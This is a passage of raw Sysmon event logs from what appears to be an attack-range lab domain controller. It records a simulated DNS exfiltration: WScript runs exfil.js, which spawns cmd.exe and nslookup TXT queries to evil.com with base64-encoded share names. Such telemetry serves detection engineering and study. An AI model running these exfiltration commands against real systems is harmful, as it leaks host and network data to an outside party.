14:16:19.811{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1B3F-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-17A1-629A-783D-000000005F02}55522032C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-1B3F-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.822{2E1864BB-17B3-629A-1B3F-000000005F02}3872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxuvs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfotgk.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.789{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.789{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.789{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.789{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000197216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.773{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=981BBD9FF1DCC890EB545EFF481B489E,SHA256=6101F6C751CEA18A6F058811FD7DBDFEF146AE2571AE481DF5616292B89C5C57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.773{2E1864BB-17B3-629A-183F-000000005F02}62285196C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-1A3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.758{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1A3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.758{2E1864BB-17B3-629A-173F-000000005F02}51285760C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-1A3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.771{2E1864BB-17B3-629A-1A3F-000000005F02}7184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-173F-000000005F02}5128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfotgk.tmp 2>&1 10341000x8000000000000000197211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.742{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-193F-000000005F02}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-193F-000000005F02}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B3-629A-193F-000000005F02}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.728{2E1864BB-17B3-629A-193F-000000005F02}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000197203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-183F-000000005F02}6228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-183F-000000005F02}6228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.727{2E1864BB-17B3-629A-183F-000000005F02}62285196C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-173F-000000005F02}5128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.711{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-183F-000000005F02}6228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.710{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.710{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.710{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.710{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.710{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-173F-000000005F02}5128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 